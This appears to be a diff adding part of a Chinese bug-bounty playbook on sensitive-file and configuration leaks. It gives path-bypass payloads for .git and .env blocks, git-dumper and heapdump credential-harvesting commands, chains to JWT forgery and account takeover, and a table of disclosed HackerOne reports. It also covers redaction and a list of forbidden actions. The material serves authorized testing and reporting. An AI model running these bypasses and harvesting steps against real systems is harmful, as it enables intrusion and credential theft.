+
207
+ ### 3.4 被动信息(前端线索)
208
+
209
+ | 来源 | 找什么 |
210
+ |------|------|
211
+ | HTML 注释 | `<!-- TODO: 上线前删 admin/admin -->` |
212
+ | JS 文件 | `apiKey =`、`SECRET_KEY =`、`token =`、`/api/internal/` 路径 |
213
+ | Source map | 站点是否暴露 `.map` 文件,可还原原始 TS/SCSS |
214
+ | 响应头 | `X-Powered-By`、`Server`、`X-AspNet-Version`、`X-DNS-Prefetch-Control` |
215
+ | robots.txt | `Disallow: /admin/` 暴露管理路径 |
216
+ | sitemap.xml | 暴露非链接的 URL |
217
+ | crossdomain.xml / clientaccesspolicy.xml | Flash/Silverlight 跨域配置 |
218
+ | `.well-known/security.txt` | 联系方式 |
219
+ | `.well-known/openid-configuration` | OAuth 配置(可看到 jwks_uri) |
220
+ | Wayback Machine | 历史页面可能暴露已删除的接口 |
221
+
222
+ ### 3.5 错误页触发字典(让目标"主动报错")
223
+
224
+ ```
225
+ ?id=1' → SQL 错误(暴露数据库类型 + 路径)
226
+ ?id[]=1 → 类型错误(PHP/Java 报 stack trace)
227
+ ?file= → 空值导致路径泄露
228
+ ?xml=<a/> → XML 解析错误
229
+ /exists.php?p=null → 看堆栈
230
+ ```
231
+
232
+ ---
233
+
234
+ ## 4. Bypass 矩阵
235
+
236
+ | 拦截 | 绕过 |
237
+ |------|------|
238
+ | `.git` 路径被 nginx 拦 | `.GIT/`、`.GiT/`、`%2egit/`、`/x/../.git/`、`//.git/` |
239
+ | `.env` 拦 | `/static/../.env`、`/uploads/.env`、`/.env%20`、`/.env.bak` |
240
+ | 备份文件后缀拦 | `.bak.bak`、`.swp` 而非 `.bak`、URL encode 后缀 |
241
+ | Cloudflare 拦 | 找 origin IP(绕过 CDN,详见 `ssrf-cache-host.md`) |
242
+ | 文件名混淆 | 时间戳:`/backup_$(date +%Y%m%d).zip`、`/2024-01-15.sql` |
243
+ | 大小写 | `/Backup.ZIP`、`/Config.PHP.BAK` |
244
+
245
+ ---
246
+
247
+ ## 5. 利用提权 / 横向(链路放大)
248
+
249
+ ### 5.1 .git → 全部源码 → DB 密码
250
+
251
+ ```bash
252
+ # 1. dump
253
+ git-dumper https://target/.git/ ./loot/
254
+ cd loot && git log --all
255
+ git show <commit>:config.php
256
+
257
+ # 2. 找凭据
258
+ grep -rE "(password|secret|apikey|token|jdbc:|mysql://|redis://)" .
259
+
260
+ # 3. 直连
261
+ mysql -h db.internal -u root -p
262
+ ```
263
+
264
+ 参考案例:wooyun-2015-0125565(阡陌金融 .git → 数据库密码)。
265
+
266
+ ### 5.2 .env → S3 / Stripe / SMTP 接管
267
+
268
+ ```
269
+ .env 常含:
270
+ AWS_ACCESS_KEY_ID=AKIA...
271
+ AWS_SECRET_ACCESS_KEY=...
272
+ STRIPE_SECRET_KEY=sk_live_...
273
+ SENDGRID_API_KEY=SG....
274
+ TWILIO_AUTH_TOKEN=...
275
+ JWT_SECRET=...
276
+ DATABASE_URL=postgres://user:pass@host/db
277
+
278
+ → AWS:aws s3 ls / aws sts get-caller-identity(不要做删除/创建动作)
279
+ → JWT secret:本地伪造任意用户 token
280
+ → DB:连接读 schema 即可,禁导出
281
+ ```
282
+
283
+ ### 5.3 Heapdump → JVM 内存里的密码
284
+
285
+ ```bash
286
+ curl http://target/actuator/heapdump -o heap.bin
287
+ strings heap.bin | grep -iE "(password|secret|jdbc|jwt|redis|aws)" | sort -u
288
+ # 或用 MAT、jhat 分析
289
+ ```
290
+
291
+ ### 5.4 Swagger / API docs → 隐藏端点
292
+
293
+ ```
294
+ /swagger-ui.html 显示完整 API 列表,包括:
295
+ /api/internal/admin/users
296
+ /api/v2/secret-debug
297
+ /api/dev/dump
298
+ 攻击者基于这个列表全量打。
299
+ ```
300
+
301
+ ### 5.5 短信 / 邮件 / 支付 API 凭据 → 全用户接管
302
+
303
+ ```
304
+ 泄露的短信平台凭据 → 调用 /api/sendSms 看到所有用户验证码
305
+ → 用验证码重置任意用户密码 → 账户接管
306
+ ```
307
+
308
+ 参考:wooyun-2015-0128813(某零食电商短信接口)。
309
+
310
+ ---
311
+
312
+ ## 6. 真实案例指纹
313
+
314
+ | 案例 ID | 类型 | 利用链 |
315
+ |--------|------|------|
316
+ | wooyun-2015-0123377 | 整站源码 zip | 源码→配置→数据库→提权 |
317
+ | wooyun-2013-038850 | TOM SVN 泄露 | SVN→源码→SQL 注入 |
318
+ | wooyun-2015-0120183 | log4net.xml/MongoDB 配置 | 配置→MongoDB→数据 |
319
+ | wooyun-2015-0163955 | 黄金集团 Session 日志 | 后台→日志→Session 劫持 |
320
+ | wooyun-2015-0128813 | 某零食电商短信 API | API→短信→账户接管 |
321
+ | wooyun-2015-0125565 | 阡陌金融 .git | .git→数据库密码 |
322
+ | wooyun-2014-049693 | 太平洋时尚网 .svn | .svn→目录遍历 |
323
+ | wooyun-2014-085529 | hitao MongoDB 未授权 | Mongo→FTP→订单数据 |
324
+ | wooyun-2015-0150430 | 某航空公司邮箱 | 邮箱→域密码→VPN |
325
+ | wooyun-2013-039470 | 某电脑厂商 data.zip | 备份文件→数据库配置 |
326
+
327
+ 通用指纹:
328
+
329
+ - **`/static/.git/HEAD` 200** + 内容 `ref: refs/heads/main` → 立即 dump
330
+ - **`/.env` 返回 200 + Content-Type: text/plain** + 含 `=` → 配置泄露
331
+ - **`/wwwroot.rar` Content-Length > 1MB** → 整站源码
332
+ - **`/server-status` 含 `Apache Status` + IP 列表** → mod_status 暴露
333
+ - **`/actuator/health` 200 + `{"status":"UP"}`** → 进一步探 actuator/env / heapdump
334
+ - **`/swagger-ui.html` + 渲染出 API 列表** → 全量端点
335
+
336
+ ---
337
+
338
+ ## 7. 复现 / 证据要点
339
+
340
+ ### 7.1 报告必备
341
+
342
+ 1. 完整请求 URL(含协议)
343
+ 2. 响应状态码 + 关键 Header
344
+ 3. 响应体片段(**敏感数据必须脱敏**)
345
+ 4. 影响:根据泄露内容估算(密码 → DB → 用户数据)
346
+
347
+ ### 7.2 脱敏样式
348
+
349
+ ```
350
+ 原文(不要写进报告):
351
+ spring.datasource.password=Mp4ssw0rd!
352
+
353
+ 报告(这样写):
354
+ spring.datasource.password=M****d!(共 13 位)
355
+
356
+ 原文:
357
+ ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxxxx... user@host
358
+
359
+ 报告:
360
+ ssh-rsa AAAAB3...(前 8 字符 + 后 8 字符 + 长度)user@host
361
+ ```
362
+
363
+ ### 7.3 CVSS 参考
364
+
365
+ ```
366
+ .git 泄露源码 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N = 7.5
367
+ .env 泄露 prod 凭据 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H = 9.8(依赖凭据用途)
368
+ phpinfo.php 暴露 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N = 5.3
369
+ heapdump 含 DB 密码 = 9.8 Critical
370
+ public S3 bucket 含 PII = 7.5+
371
+ ```
372
+
373
+ ### 7.4 影响段写法
374
+
375
+ ```
376
+ 通过未授权访问 /.git/ 目录,攻击者可使用 git-dumper 工具完整恢复后端
377
+ 源代码(约 400 个 .java 文件)。源码中 src/main/resources/application-prod.yml
378
+ 明文存储以下凭据:
379
+ 1. 主数据库密码(mysql://prod-db:3306),可直读所有用户表;
380
+ 2. JWT 签名密钥,可伪造任意用户身份;
381
+ 3. AWS S3 Access Key,可读取存储桶中所有用户上传文件。
382
+
383
+ 我已停止于"读到 application-prod.yml 文件名"步骤,未尝试连接任何凭据。
384
+ ```
385
+
386
+ ---
387
+
388
+ ## 8. 不要做的事
389
+
390
+ - **禁**:clone 完整源码到自己 GitHub / 公网仓库。本地保存,报告后删除。
391
+ - **禁**:用泄露的 AWS / Stripe / SendGrid 凭据创建资源、发邮件、扣款。
392
+ - **禁**:用泄露的 DB 凭据连接生产库导出数据。仅做"能 telnet 通端口 + 看到 DB banner"的最小验证。
393
+ - **禁**:用泄露的短信 API 给真实手机号发短信。
394
+ - **禁**:在报告中粘贴完整凭据。脱敏,附 sha256 指纹证明你拿到过。
395
+ - **限**:扫描限速 1–5 rps;备份字典控制在 1000 条以内,避免触发风控。
396
+
397
+ ## H1 真实案例
398
+
399
+ _共 319 份 HackerOne 已披露 High/Critical 报告命中本类,按 (赏金 + 投票×100) 排序取 Top 12_
400
+
401
+ | Severity | $ | 程序 | 标题(点击看原报告) | 摘要 |
402
+ |---|--:|---|---|---|
403
+ | Critical | 50000 usd | Shopify | [Github access token exposure](https://hackerone.com/reports/1087489) | While dissecting an application made by one of your employees I found his GitHub Personal Access Token (PAT), he's a member of … |
404
+ | High | 20000 usd | HackerOne | [Account takeover via leaked session cookie](https://hackerone.com/reports/745324) | Summary:** You are disclose for me you session Description:** you are gevi me your session on last report I am can use your ses… |
405
+ | Critical | — | HackerOne | [Confidential data of users and limited metadata of programs and reports accessible via GraphQL](https://hackerone.com/reports/489146) | Summary:** The GraphQL endpoint doesn't have access controls implemented properly |
406
+ | Critical | 25000 usd | HackerOne | [The /reports/:id.json endpoint discloses potentially sensitive user attributes when reporter summ…](https://hackerone.com/reports/3000510) | Hi The.json endpoint of any disclosed report is leaking reporter's email, OTP backup codes, reporter's phone number, "graphql_s… |
407
+ | Critical | 39999 usd | Uber | [[Pre-Submission][H1-4420-2019] API access to Phabricator on code.uberinternal.com from leaked cer…](https://hackerone.com/reports/591813) | [Pre-Submission][H1-4420-2019] API access to Phabricator on code.uberinternal.com from leaked certificate in git repo |
408
+ | High | 7500 usd | HackerOne | [Customer private program can disclose email any users through invited via username](https://hackerone.com/reports/807448) | Summary: Hey team,This bug could have been used by my calculations a long time ago Steps To Reproduce: 1)Go to https://hackeron… |
409
+ | High | — | Uber | [Sensitive user information disclosure at bonjour.uber.com/marketplace/_rpc via the 'userUuid' par…](https://hackerone.com/reports/542340) | Sensitive user information disclosure at bonjour.uber.com/marketplace/_rpc via the 'userUuid' parameter |
410
+ | High | 15000 usd | Snapchat | [Open prod Jenkins instance](https://hackerone.com/reports/231460) | Open prod Jenkins instance |
411
+ | Critical | — | Snapchat | [Github Token Leaked publicly for https://github.sc-corp.net](https://hackerone.com/reports/396467) | Description : GitHub is a truly awesome service but it is unwise to put any sensitive data in code that is hosted on GitHub and… |
412
+ | High | 10000 usd | Snapchat | [Access to multiple production Grafana dashboards](https://hackerone.com/reports/663628) | Access to multiple production Grafana dashboards |
413
+ | High | 12500 usd | HackerOne | [An attacker can can view any hacker email via /SaveCollaboratorsMutation operation name](https://hackerone.com/reports/2032716) | Summary:** An attacker can view any attacker or normal user email after send invitation via dummy report , disclose their priva… |
414
+ | Critical | 10000 usd | GitLab | [gitlab-workhorse bypass in Gitlab::Middleware::Multipart allowing files in `allowed_paths` to be …](https://hackerone.com/reports/850447) | Summary Extracted from https://hackerone.com/reports/835455#activity-7672566 While testing and looking at the patch for the nug… |
415
+
416
+ **命中本类的 weakness 分布:**
417
+
418
+ - Information Disclosure:207 条
419
+ - Cleartext Storage of Sensitive Information:22 条
420
+ - Insecure Storage of Sensitive Information:22 条
421
+ - Privacy Violation:15 条
422
+ - Information Exposure Through Directory Listing:12 条
423
+ - Insufficiently Protected Credentials:10 条
424
+ - Uncategorized → 手工归类:6 条
425
+ - Information Exposure Through Debug Information:5 条
426
+ - Cleartext Transmission of Sensitive Information:5 条
427
+ - Information Exposure Through Sent Data:4 条
428
+ - Information Exposure Through an Error Message:3 条
429
+ - Missing Encryption of Sensitive Data:3 条
430
+ - File and Directory Information Exposure:2 条
431
+ - Password in Configuration File:2 条
432
+ - Inclusion of Sensitive Information in an Include File:1 条